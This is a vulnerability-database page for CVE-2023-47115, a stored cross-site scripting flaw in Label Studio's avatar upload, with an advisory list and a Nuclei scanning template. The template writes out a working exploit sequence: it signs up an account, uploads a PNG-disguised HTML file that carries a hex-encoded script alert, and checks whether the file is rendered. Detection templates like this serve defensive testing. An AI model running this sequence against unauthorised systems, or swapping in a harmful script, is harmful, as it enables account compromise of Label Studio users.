| Reporter | Title | Published | Views | Family All 16 |
|---|---|---|---|---|
| CVE-2023-47115 | 23 Jan 202422:24 | – | circl | |
| Label Studio Cross-Site Scripting Vulnerability | 23 Jan 202400:00 | – | cnnvd | |
| CVE-2023-47115 | 23 Jan 202422:49 | – | cve | |
| CVE-2023-47115 Label Studio XSS Vulnerability on Avatar Upload | 23 Jan 202422:49 | – | cvelist | |
| EUVD-2024-0082 | 3 Oct 202520:07 | – | euvd | |
| Cross-site Scripting Vulnerability on Avatar Upload | 24 Jan 202414:21 | – | github | |
| CVE-2023-47115 | 23 Jan 202423:15 | – | nvd | |
| CVE-2023-47115 Label Studio XSS Vulnerability on Avatar Upload | 23 Jan 202422:49 | – | osv | |
| GHSA-Q68H-XWQ5-MM7X Cross-site Scripting Vulnerability on Avatar Upload | 24 Jan 202414:21 | – | osv | |
| PYSEC-2024-126 | 23 Jan 202423:15 | – | osv |
id: CVE-2023-47115
info:
name: Label Studio - Cross-Site Scripting
author: isacaya
severity: high
description: |
Versions prior to 1.9.2 have a cross-site scripting (XSS) vulnerability that could be exploited when an authenticated user uploads a crafted image file for their avatar that gets rendered as a HTML file on the website.
impact: |
Executing arbitrary JavaScript could result in an attacker performing malicious actions on Label Studio users if they visit the crafted avatar image.
remediation: |
Update to version 1.9.2.
reference:
- https://github.com/advisories/GHSA-q68h-xwq5-mm7x
- https://docs.djangoproject.com/en/4.2/ref/views/#serving-files-in-development
- https://github.com/HumanSignal/label-studio/blob/1.8.2/label_studio/users/functions.py#L18-L49
- https://github.com/HumanSignal/label-studio/blob/1.8.2/label_studio/users/urls.py#L25-L26
- https://nvd.nist.gov/vuln/detail/CVE-2023-47115
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L
cvss-score: 7.1
cve-id: CVE-2023-47115
cwe-id: CWE-79
epss-score: 0.01448
epss-percentile: 0.70116
cpe: cpe:2.3:a:humansignal:label_studio:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 6
shodan-query: http.favicon.hash:-1649949475
product: label_studio
vendor: humansignal
tags: cve,cve2023,xss,authenticated,intrusive,label-studio,vuln
http:
- raw:
- |
GET /user/login/ HTTP/1.1
Host: {{Hostname}}
- |
POST /user/signup/?&next=/projects/ HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
csrfmiddlewaretoken={{csrftoken}}&email={{randstr_1}}%40{{randstr_1}}.{{randstr_1}}&password={{randstr_2}}&allow_newsletters=false
- |
GET /api/current-user/whoami HTTP/1.1
Host: {{Hostname}}
- |
POST /api/users/{{id}}/avatar/ HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarytZZRQ9D2LS0PMsHF
------WebKitFormBoundarytZZRQ9D2LS0PMsHF
Content-Disposition: form-data; name="avatar"; filename="nuclei.html"
Content-Type: image/png
{{hex_decode("89504E470D0A1A0A0000000D4948445200000009000000080802000000A4AF42E200000046494441543C7363726970743E616C65727428646F63756D656E742E646F6D61696E293C2F7363726970743E")}}
------WebKitFormBoundarytZZRQ9D2LS0PMsHF
- |
GET /api/current-user/whoami HTTP/1.1
Host: {{Hostname}}
- |
GET {{filename}} HTTP/1.1
Host: {{Hostname}}
extractors:
- type: xpath
name: csrftoken
internal: true
attribute: value
xpath:
- '/html/body/div/form/input'
- type: json
part: body
name: id
internal: true
json:
- '.id'
- type: json
part: body
name: filename
internal: true
json:
- '.avatar'
matchers:
- type: dsl
dsl:
- "status_code == 200"
- "contains(header, 'text/html')"
- 'contains(body, "<script>alert(document.domain)</script>")'
condition: and
# digest: 4a0a00473045022100cb18dfa741f9efa5a69833c685a5696f062f4722b032f2ef796333a80b6680e30220474b7513d5121d1e536ea3c1ee01a17be54db80e4990c1c2ebbd164fbb4be589:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation